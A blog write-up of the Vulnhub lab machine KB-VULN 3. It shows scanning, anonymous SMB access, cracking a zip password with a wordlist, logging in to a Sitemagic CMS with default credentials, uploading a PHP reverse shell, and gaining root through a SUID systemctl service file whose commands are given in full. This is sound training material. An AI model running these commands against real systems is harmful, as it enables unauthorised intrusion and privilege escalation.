sarthakrsc21.medium.com

KB-VULN: 3 Vulnhub Writeup

Sarthak joshi
3–4 minutes

Sarthak joshi

Hey folks! Kb_vuln 3 is the third installment of the KB series on the vulnhub and today I’m going to solve this VM created by ‘machineboy’ . It’s an easy box and here is the link where you can download this VM link:- https://www.vulnhub.com/entry/kb-vuln-3,579/

1.) Target Discovery

‘# netdiscover -i wlan0’

the target ip address is ‘192.168.1.3’.

2.) Port Scanning and Service Detection

‘#nmap -sTV -p- 192.168.1.3’

From nmap result we can see that http,ssh and smb services are running on this VM.

3.) SMB Enumeration

‘# smbclient -L //192.168.1.3’

The above command shows that we can access a ‘Files’ share from smb protocol.

‘# smbclient //192.168.1.3/Files/’

Press enter or click to view image in full size

we can access ‘Files’ share without password(anonymously) and here I got a ‘website.zip’ file, it seems like a website backup so I transfer that file to my localhost.

But this zip file is password protected. To crack this zip file password I used ‘fcrackzip’ tool

Get Sarthak joshi’s stories in your inbox

Join Medium for free to get updates from this writer.

‘#fcrackzip -v -u -D -p /opt/wordlist/rockyou.txt webzite.zip’

Press enter or click to view image in full size

And we found the right password “porchman” after extracting that zip file I found that it’s a website backup named as ‘sitemagic’.

4.) HTTP Enumeration

It may be possible that sitemagic cms is running on the website and I was right as we hit the url “http://192.168.1.3/sitemagic” we can see a sitemagic cms installation on the web.

Press enter or click to view image in full size

I tried to login with the default credentials admin:admin and I was able to successfully login.

Press enter or click to view image in full size

5.) Reverse Shell

Press enter or click to view image in full size

In the cms I found a file upload vulnerability through which I can upload a php reverse shell.

Then I uploaded a ‘php.php’ reverse shell on the web as you can see in the above image.

Press enter or click to view image in full size

After uploading and triggering the reverse shell I got connection back on my netcat Listener.

6.)Privilege Escalation

‘$ find / -perm -u=s -type f 2>/dev/null’

with the help of above command I found that ‘systemctl’ has SUID

:) Time to Exploit the SUID ;)

Press enter or click to view image in full size

To exploit the ‘systemctl’ command I fired these commands

“$ echo ‘[Service]
Type=oneshot
ExecStart=/bin/sh -c “cp /bin/bash /var/www/html/sitemagic/ && chmod +s /var/www/html/sitemagic/bash”
[Install]
WantedBy=multi-user.target’ > /var/www/html/sitemagic/shell.service ”

“$ systemctl link /var/www/html/sitemagic/shell.service”

“$ cd /var/www/html/sitemagic/”

“$./bash -p”

Press enter or click to view image in full size

SUID exploitation successful. I got the root privilege and ‘root.txt’ flag

Rooted :)